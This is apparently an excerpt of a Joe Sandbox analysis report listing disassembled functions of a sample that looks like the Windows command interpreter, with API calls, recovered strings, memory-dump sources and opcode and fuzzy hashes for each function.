                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2447294730-2301591722
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 23304ab8e48419b586fbfbffc247549999400a16808904d80f441e5118b7b68b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9f98b291bf248d45bd960cae592990d87f0abe27ac18deb5731aaf4d3921ccb6
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23304ab8e48419b586fbfbffc247549999400a16808904d80f441e5118b7b68b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5131003220878EABD7186733AC0EABB379DEB45324B28641DF605F01D0FF54D401956B
                                                                                                                                                                                                                                                                                                                                                      Function 00F09C2E Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 250COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _wcsupr.MSVCRT ref: 00F09CC8
                                                                                                                                                                                                                                                                                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?), ref: 00F09D22
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00F09D2A
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F09D3A
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F09D50
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00F09D58
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F09D68
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F09D7C
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00F09DDB
                                                                                                                                                                                                                                                                                                                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00F09DE2
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 00F09DF2
                                                                                                                                                                                                                                                                                                                                                      • towupper.MSVCRT ref: 00F09E13
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA16C: _close.MSVCRT ref: 00EEA19B
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00F09E6A
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00F09E9B
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00F09EA9
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDD98: _get_osfhandle.MSVCRT ref: 00EEDDA3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EFC050), ref: 00EEDDAD
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID: <noalias>$CMD.EXE
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2015057810-1690691951
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3b1a6b06f4c739e22c3f17de471a2688fb61cf282d7294fb4ab2ad95f10f4be6
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0086ac9e6222da7c204509e47a6a07318cf343eecb9ffea84b3fab8fddadc07b
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b1a6b06f4c739e22c3f17de471a2688fb61cf282d7294fb4ab2ad95f10f4be6
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9281D272E042199BCB24DBB4DC45AEEBBB9AF45720F144119F802E71D2EAB19C02E761
                                                                                                                                                                                                                                                                                                                                                      Function 00EE790C Relevance: 28.7, APIs: 19, Instructions: 208COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: _get_osfhandle.MSVCRT ref: 00EE9A1C
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EE793A,00000104,?), ref: 00EE9A2B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A47
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A56
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A61
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A6A
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EE7943
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE7951
                                                                                                                                                                                                                                                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00F20AF0,000000A0,00000000,00000000,00000000,?,00000104,?), ref: 00EE79BE
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00000104,?), ref: 00EE7A1C
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EE7A27
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2173784998-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a1de027be732c181d8a37f65c04280a462b40391dd90b7374c0163ddd854d7f6
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: d7353466073eea2863cdac960231459e2d45948d360633435cb55e68ac01f7f1
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1de027be732c181d8a37f65c04280a462b40391dd90b7374c0163ddd854d7f6
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8771AE71A0421CEFCB24DFA5DC88ABEBBB9FF48301F15502AE906F6251EB748805DB51
                                                                                                                                                                                                                                                                                                                                                      Function 00F02859 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 165windowthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 00F02931
                                                                                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00F02998
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CurrentFormatMessageThread
                                                                                                                                                                                                                                                                                                                                                      • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $P3$ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2411632146-2026947634
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c58642854f7a967d60e587fbf1a2b88cf2eb77ec331b52134c782baf63d3aaf1
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b606bb99697702dc5f244f4d4b4d867e84bad4de4326634329861e95eec780cb
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c58642854f7a967d60e587fbf1a2b88cf2eb77ec331b52134c782baf63d3aaf1
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9251E171A00318ABDB319B7A8C4EE6BB7B8EF44704F00455DF566A21E1DA75DA80FB31
                                                                                                                                                                                                                                                                                                                                                      Function 00EF0590 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 181fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00EFB7DB,0000000C,00000004,00000080,00000000), ref: 00EF05FF
                                                                                                                                                                                                                                                                                                                                                      • _open_osfhandle.MSVCRT ref: 00EF0613
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EF0663
                                                                                                                                                                                                                                                                                                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,?,?), ref: 00EF0695
                                                                                                                                                                                                                                                                                                                                                      • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 00EF06D3
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 00EF06FB
                                                                                                                                                                                                                                                                                                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 00EF0717
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 00EFE89D
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$CreatePointer$ReadSize_open_osfhandle_wcsicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: con
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 58404892-4257191772
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a9ae9c5596887eaff4dc3113105e0c20f4cf209179cd8e818b8ff5c65aae8d99
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c44d20b80114f6b6b7bcd98d8031d367f38e10778dc0259389c2a4eefb72e664
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9ae9c5596887eaff4dc3113105e0c20f4cf209179cd8e818b8ff5c65aae8d99
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21511671A0020CAFDB20DF649C48FFEB7B8EB85724F254229FA21F22D1D77199019B61
                                                                                                                                                                                                                                                                                                                                                      Function 00EF56C4 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 297COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A70,000000FF,00000000,?,00000001,?,?,?,00EF5833,?, /D /c",?,?,?,00000000,?), ref: 00F01271
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: longjmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?$8
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1832741078-4019693922
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1f1e90dffab06f1202418da611cc383d045d9119066252dc995e123f7c00b8d7
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b46129ee5069e054b7e28335132121487596ac2d383959f0e9b04143a7b63c8a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f1e90dffab06f1202418da611cc383d045d9119066252dc995e123f7c00b8d7
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43A1E475A0060CEBCF24DF15C98597E7B65FB953A4B20A016F602AB6E0CB70DD51FB81
                                                                                                                                                                                                                                                                                                                                                      Function 00F0C5F2 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0C62E
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0C656
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 00F0C6C7
                                                                                                                                                                                                                                                                                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 00F0C6E6
                                                                                                                                                                                                                                                                                                                                                      • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 00F0C72A
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00F0C747
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00F0C76C
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00F0C794
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 00F0C7B3
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 00F0C7C5
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                                                                                                                                                                                                                                                      • String ID: CSVFS$NTFS$REFS
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3510147486-2605508654
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 491cf2ec61df04d03cb53733b9eaf36123f9442536c44d90a990c952d5a3c9b4
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3d5ab0bbe4d611f0605137499f95a7f0874f169180315abbf44c3f571d07b3e9
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 491cf2ec61df04d03cb53733b9eaf36123f9442536c44d90a990c952d5a3c9b4
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 845153B1E002599BDB24DB65DC89AEFBBB8EF44354F0401A9E505E3181EB34DE84EF61
                                                                                                                                                                                                                                                                                                                                                      Function 00EE9789 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2081463915-3124875276
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e7aad97dae66de1cab2cf6216293afeed74b41038edbf74686a5ec4563ca4723
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f2dd107d2517b95875c49b054efd33ba6687e167555acafd4b01f1e0f6c41d82
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7aad97dae66de1cab2cf6216293afeed74b41038edbf74686a5ec4563ca4723
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50412C3120438ED7D7386F27E8557BA33E4EB92728B24242ED102B50E2EBE6D445E716
                                                                                                                                                                                                                                                                                                                                                      Function 00EE7E93 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,00000000,00000000,00F20AF0,00002000,00000000,00000000,00000000,00000000), ref: 00EE7ED4
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA62F: wcschr.MSVCRT ref: 00EEA635
                                                                                                                                                                                                                                                                                                                                                      • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,00000000,00000000,00F20AF0,00002000,?), ref: 00EE7F16
                                                                                                                                                                                                                                                                                                                                                      • _ultoa.MSVCRT ref: 00EFAFC9
                                                                                                                                                                                                                                                                                                                                                      • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 00EFAFDE
                                                                                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 00EFAFF3
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID: Application$System
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3538039442-3455788185
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9ed4581129c93ed266a4838934eab12045a9b7ddae4ff3de0be98c1646254c4a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 95160178d033c86c433ce073176e7ec84a00a487eafb240193f4692a74266bf5
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ed4581129c93ed266a4838934eab12045a9b7ddae4ff3de0be98c1646254c4a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E641E3B274031DABEB209B65DC4AFBE77A9EB45750F101028F606FF281DA709D01DB51
                                                                                                                                                                                                                                                                                                                                                      Function 00EEE950 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 276COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memsetwcschr$_wcsicmpiswspace
                                                                                                                                                                                                                                                                                                                                                      • String ID: :.\$=,;$=,;+/[] "
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1913572127-843887632
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: cb3adba76d44d4c03cd449947189e6f6e065ebe28477fb015ad2447aa49876c8
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 4167708a2fd00c51c8e4b1d34bc40dbe421e5e8707a6a4e8f9a87070fdb9acc4
